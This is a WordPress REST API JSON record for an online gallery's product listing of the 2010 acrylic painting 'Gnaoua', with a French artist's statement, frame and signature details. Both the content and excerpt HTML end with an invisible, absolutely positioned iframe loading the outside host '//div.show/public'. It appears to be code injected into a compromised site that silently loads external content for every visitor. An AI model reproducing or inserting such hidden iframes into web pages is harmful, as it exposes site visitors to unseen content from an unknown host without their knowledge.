{"id":5419,"date":"2024-09-07T15:56:33","date_gmt":"2024-09-07T13:56:33","guid":{"rendered":"https:\/\/meskinigallery.com\/?post_type=product&#038;p=5419"},"modified":"2024-09-07T15:56:34","modified_gmt":"2024-09-07T13:56:34","slug":"gnaoua","status":"publish","type":"product","link":"https:\/\/meskinigallery.com\/index.php\/product\/gnaoua\/","title":{"rendered":"Gnaoua"},"content":{"rendered":"<p>Titre\u00a0: <b>Gnaoua<\/b><\/p>\n<p>Courant\u00a0: <b>Acrylique sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2010<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><b>\u00ab C&rsquo;est l&rsquo;un des sujets sur lesquels j&rsquo;ai beaucoup travaill\u00e9 avec une remarquable rapidit\u00e9 de r\u00e9alisation, et ceci en coh\u00e9rence avec les rythmes de la performance Gnaoui et le mouvement des formes dessin\u00e9es spontan\u00e9ment de m\u00e9moire.<\/b><\/p>\n<p><b>En termes de couleurs, j&rsquo;ai volontairement divis\u00e9 le tableau en couleurs chaudes, d&rsquo;un c\u00f4t\u00e9, et couleurs froides de l&rsquo;autre, pour le doter d\u2019une combinaison originale: Les danses Gnawa, Fantasia et Tabourida dans leurs diverses formes. \u00bb<\/b><\/p>\n<p><a name=\"_GoBack\"><\/a> Cadre\u00a0: <b>Bois massif, cadre champagne vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Titre\u00a0: <b>Gnaoua<\/b><\/p>\n<p>Courant\u00a0: <b>Acrylique sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2010<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><b>\u00ab C&rsquo;est l&rsquo;un des sujets sur lesquels j&rsquo;ai beaucoup travaill\u00e9 avec une remarquable rapidit\u00e9 de r\u00e9alisation, et ceci en coh\u00e9rence avec les rythmes de la performance Gnaoui et le mouvement des formes dessin\u00e9es spontan\u00e9ment de m\u00e9moire.<\/b><\/p>\n<p><b>En termes de couleurs, j&rsquo;ai volontairement divis\u00e9 le tableau en couleurs chaudes, d&rsquo;un c\u00f4t\u00e9, et couleurs froides de l&rsquo;autre, pour le doter d\u2019une combinaison originale: Les danses Gnawa, Fantasia et Tabourida dans leurs diverses formes. \u00bb<\/b><\/p>\n<p><a name=\"_GoBack\"><\/a> Cadre\u00a0: <b>Bois massif, cadre champagne vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"featured_media":5089,"template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"product_brand":[],"product_cat":[40],"product_tag":[],"giftcard-category":[],"class_list":{"0":"post-5419","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-impressionisme","9":"instock","10":"taxable","11":"shipping-taxable","12":"product-type-simple","13":"product-grid-view"},"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5419","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5419\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media\/5089"}],"wp:attachment":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=5419"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=5419"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=5419"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=5419"},{"taxonomy":"giftcard-category","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/giftcard-category?post=5419"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}